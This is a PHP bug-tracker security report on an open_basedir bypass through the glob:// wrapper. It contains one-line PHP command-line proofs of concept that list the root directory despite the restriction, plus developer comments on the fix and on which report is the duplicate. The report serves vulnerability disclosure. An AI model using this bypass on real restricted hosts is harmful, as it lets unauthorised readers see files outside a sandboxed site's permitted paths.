php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #73710 open_basedir bypass via glob wrapper
Submitted: 2016-12-10 14:39 UTC Modified: 2017-01-10 00:33 UTC
From: beched at ya dot ru Assigned: pollita (profile)
Status: Duplicate Package: Directory function related
PHP Version: Irrelevant OS:
Private report: No CVE-ID: None
 [2016-12-10 14:39 UTC] beched at ya dot ru
Description:
------------
This very old and well-known issue, which I decided to report almost 5 years after posting it on rdot forum.
The reason is here: http://lxr.php.net/xref/PHP-7.1/main/streams/glob_wrapper.c#208
Wrapper prefix "glob://" is cut off _after_ php_check_open_basedir is called, so that path is considered as relative, whereas it is absolute.
Obviously, if-block on line 216 should be put after line 221, where path is sliced.

Test script:
---------------
php -dopen_basedir=/home/beched -r 'foreach(new DirectoryIterator("glob:///*") as $f) echo "$f\n";'

or

php -dopen_basedir=/home/beched -r 'foreach(new GlobIterator("/*") as $f) echo "$f\n";'

Expected result:
----------------
PHP Fatal error:  Uncaught UnexpectedValueException: DirectoryIterator::__construct(): open_basedir restriction in effect. File(glob:///*) is not within the allowed path(s): (/home/beched) in Command line code:1
Stack trace:
#0 Command line code(1): DirectoryIterator->__construct('glob:///*')
#1 {main}
  thrown in Command line code on line 1


Actual result:
--------------
bin
boot
build
cdrom
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
logs
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-01-09 18:47 UTC] pollita@php.net
-Assigned To: +Assigned To: pollita
 [2017-01-10 00:17 UTC] pollita@php.net
-Status: Assigned +Status: Closed
 [2017-01-10 00:17 UTC] pollita@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

https://github.com/php/php-src/commit/7e49e8e7970b423968de7a53ea9a0796f4634276
 [2017-01-10 00:33 UTC] stas@php.net
-Status: Closed +Status: Duplicate
 [2017-01-10 00:33 UTC] stas@php.net
Same as bug #73891.
 [2017-01-10 09:46 UTC] beched at ya dot ru
Well, I guess, you created a relation recursion of reports.
Bug #73891 is duplicate of this (and was reported 1 month later, while this report was ignored), not vice versa.
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Tue May 21 08:01:26 2019 UTC